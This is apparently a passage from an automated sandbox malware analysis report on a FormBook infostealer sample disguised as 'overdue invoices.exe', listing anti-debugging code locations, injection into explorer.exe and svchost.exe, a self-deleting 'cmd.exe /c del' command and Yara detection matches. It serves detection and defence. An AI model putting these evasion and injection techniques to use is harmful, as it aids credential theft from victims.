          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_009C8E00 mov eax, dword ptr fs:[00000030h]1_2_009C8E00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335E730 mov eax, dword ptr fs:[00000030h]11_2_0335E730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03324F2E mov eax, dword ptr fs:[00000030h]11_2_03324F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03324F2E mov eax, dword ptr fs:[00000030h]11_2_03324F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E131B mov eax, dword ptr fs:[00000030h]11_2_033E131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BFF10 mov eax, dword ptr fs:[00000030h]11_2_033BFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BFF10 mov eax, dword ptr fs:[00000030h]11_2_033BFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F070D mov eax, dword ptr fs:[00000030h]11_2_033F070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F070D mov eax, dword ptr fs:[00000030h]11_2_033F070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332DB60 mov ecx, dword ptr fs:[00000030h]11_2_0332DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F8F6A mov eax, dword ptr fs:[00000030h]11_2_033F8F6A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F8B58 mov eax, dword ptr fs:[00000030h]11_2_033F8B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332F358 mov eax, dword ptr fs:[00000030h]11_2_0332F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332DB40 mov eax, dword ptr fs:[00000030h]11_2_0332DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0333EF40 mov eax, dword ptr fs:[00000030h]11_2_0333EF40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F5BA5 mov eax, dword ptr fs:[00000030h]11_2_033F5BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E138A mov eax, dword ptr fs:[00000030h]11_2_033E138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03331B8F mov eax, dword ptr fs:[00000030h]11_2_03331B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03331B8F mov eax, dword ptr fs:[00000030h]11_2_03331B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033DD380 mov ecx, dword ptr fs:[00000030h]11_2_033DD380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033DFE3F mov eax, dword ptr fs:[00000030h]11_2_033DFE3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332E620 mov eax, dword ptr fs:[00000030h]11_2_0332E620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332C600 mov eax, dword ptr fs:[00000030h]11_2_0332C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332C600 mov eax, dword ptr fs:[00000030h]11_2_0332C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332C600 mov eax, dword ptr fs:[00000030h]11_2_0332C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0336927A mov eax, dword ptr fs:[00000030h]11_2_0336927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033DB260 mov eax, dword ptr fs:[00000030h]11_2_033DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033DB260 mov eax, dword ptr fs:[00000030h]11_2_033DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0333766D mov eax, dword ptr fs:[00000030h]11_2_0333766D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F0EA5 mov eax, dword ptr fs:[00000030h]11_2_033F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F0EA5 mov eax, dword ptr fs:[00000030h]11_2_033F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F0EA5 mov eax, dword ptr fs:[00000030h]11_2_033F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033A46A7 mov eax, dword ptr fs:[00000030h]11_2_033A46A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335D294 mov eax, dword ptr fs:[00000030h]11_2_0335D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335D294 mov eax, dword ptr fs:[00000030h]11_2_0335D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BFE87 mov eax, dword ptr fs:[00000030h]11_2_033BFE87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033376E2 mov eax, dword ptr fs:[00000030h]11_2_033376E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033516E0 mov ecx, dword ptr fs:[00000030h]11_2_033516E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F8ED6 mov eax, dword ptr fs:[00000030h]11_2_033F8ED6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033536CC mov eax, dword ptr fs:[00000030h]11_2_033536CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033DFEC0 mov eax, dword ptr fs:[00000030h]11_2_033DFEC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332AD30 mov eax, dword ptr fs:[00000030h]11_2_0332AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F8D34 mov eax, dword ptr fs:[00000030h]11_2_033F8D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03354D3B mov eax, dword ptr fs:[00000030h]11_2_03354D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03354D3B mov eax, dword ptr fs:[00000030h]11_2_03354D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03354D3B mov eax, dword ptr fs:[00000030h]11_2_03354D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335513A mov eax, dword ptr fs:[00000030h]11_2_0335513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335513A mov eax, dword ptr fs:[00000030h]11_2_0335513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03344120 mov eax, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03344120 mov eax, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03344120 mov eax, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03344120 mov eax, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03344120 mov ecx, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03329100 mov eax, dword ptr fs:[00000030h]11_2_03329100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03329100 mov eax, dword ptr fs:[00000030h]11_2_03329100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03329100 mov eax, dword ptr fs:[00000030h]11_2_03329100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332B171 mov eax, dword ptr fs:[00000030h]11_2_0332B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332B171 mov eax, dword ptr fs:[00000030h]11_2_0332B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0334C577 mov eax, dword ptr fs:[00000030h]11_2_0334C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0334C577 mov eax, dword ptr fs:[00000030h]11_2_0334C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03347D50 mov eax, dword ptr fs:[00000030h]11_2_03347D50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0334B944 mov eax, dword ptr fs:[00000030h]11_2_0334B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0334B944 mov eax, dword ptr fs:[00000030h]11_2_0334B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03363D43 mov eax, dword ptr fs:[00000030h]11_2_03363D43
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033A3540 mov eax, dword ptr fs:[00000030h]11_2_033A3540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033535A1 mov eax, dword ptr fs:[00000030h]11_2_033535A1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335FD9B mov eax, dword ptr fs:[00000030h]11_2_0335FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335FD9B mov eax, dword ptr fs:[00000030h]11_2_0335FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335A185 mov eax, dword ptr fs:[00000030h]11_2_0335A185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0334C182 mov eax, dword ptr fs:[00000030h]11_2_0334C182
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033D8DF1 mov eax, dword ptr fs:[00000030h]11_2_033D8DF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332B1E1 mov eax, dword ptr fs:[00000030h]11_2_0332B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332B1E1 mov eax, dword ptr fs:[00000030h]11_2_0332B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0332B1E1 mov eax, dword ptr fs:[00000030h]11_2_0332B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0333B02A mov eax, dword ptr fs:[00000030h]11_2_0333B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0333B02A mov eax, dword ptr fs:[00000030h]11_2_0333B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0333B02A mov eax, dword ptr fs:[00000030h]11_2_0333B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0333B02A mov eax, dword ptr fs:[00000030h]11_2_0333B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335BC2C mov eax, dword ptr fs:[00000030h]11_2_0335BC2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F4015 mov eax, dword ptr fs:[00000030h]11_2_033F4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F4015 mov eax, dword ptr fs:[00000030h]11_2_033F4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033A7016 mov eax, dword ptr fs:[00000030h]11_2_033A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033A7016 mov eax, dword ptr fs:[00000030h]11_2_033A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033A7016 mov eax, dword ptr fs:[00000030h]11_2_033A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F740D mov eax, dword ptr fs:[00000030h]11_2_033F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F740D mov eax, dword ptr fs:[00000030h]11_2_033F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F740D mov eax, dword ptr fs:[00000030h]11_2_033F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F1074 mov eax, dword ptr fs:[00000030h]11_2_033F1074
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E2073 mov eax, dword ptr fs:[00000030h]11_2_033E2073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0334746D mov eax, dword ptr fs:[00000030h]11_2_0334746D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BC450 mov eax, dword ptr fs:[00000030h]11_2_033BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BC450 mov eax, dword ptr fs:[00000030h]11_2_033BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335F0BF mov ecx, dword ptr fs:[00000030h]11_2_0335F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335F0BF mov eax, dword ptr fs:[00000030h]11_2_0335F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0335F0BF mov eax, dword ptr fs:[00000030h]11_2_0335F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033690AF mov eax, dword ptr fs:[00000030h]11_2_033690AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03329080 mov eax, dword ptr fs:[00000030h]11_2_03329080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033A3884 mov eax, dword ptr fs:[00000030h]11_2_033A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033A3884 mov eax, dword ptr fs:[00000030h]11_2_033A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033E14FB mov eax, dword ptr fs:[00000030h]11_2_033E14FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033F8CD6 mov eax, dword ptr fs:[00000030h]11_2_033F8CD6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BB8D0 mov eax, dword ptr fs:[00000030h]11_2_033BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BB8D0 mov ecx, dword ptr fs:[00000030h]11_2_033BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BB8D0 mov eax, dword ptr fs:[00000030h]11_2_033BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BB8D0 mov eax, dword ptr fs:[00000030h]11_2_033BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BB8D0 mov eax, dword ptr fs:[00000030h]11_2_033BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_033BB8D0 mov eax, dword ptr fs:[00000030h]11_2_033BB8D0
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 1_2_00409B40 LdrLoadDll,1_2_00409B40

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\overdue invoices.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\overdue invoices.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\overdue invoices.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 4768Jump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess created: C:\Users\user\Desktop\overdue invoices.exe "C:\Users\user\Desktop\overdue invoices.exe" Jump to behavior
          Source: C:\Users\user\Desktop\overdue invoices.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\overdue invoices.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.396932530.00000000083EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.372031934.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382802561.00000000083EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.357411084.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.392099173.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365496291.00000000083EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.421179202.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.390132183.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.586499289.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.609968569.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.545184848.000000000480D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.545672656.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.608047781.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.609403030.000000000480D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.389722019.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.372031934.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.357253926.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.357411084.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.371760370.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.420644613.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.421179202.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.390132183.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.586499289.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.606503278.0000000000749000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.609968569.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.545672656.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.608047781.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.606601992.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.543314235.0000000000749000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.603685695.0000000000749000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.609295302.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.545061952.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.585290137.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.582773403.0000000000749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.372031934.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.357411084.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.421179202.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.390132183.0000000000EE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.372031934.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.357411084.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.421179202.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.390132183.0000000000EE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\overdue invoices.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405AA7
          Source: explorer.exe, 00000014.00000000.607521036.0000000004851000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.586000921.0000000004851000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.609558371.0000000004851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.overdue invoices.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.overdue invoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.overdue invoices.exe.21a0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.overdue invoices.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.overdue invoices.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.overdue invoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
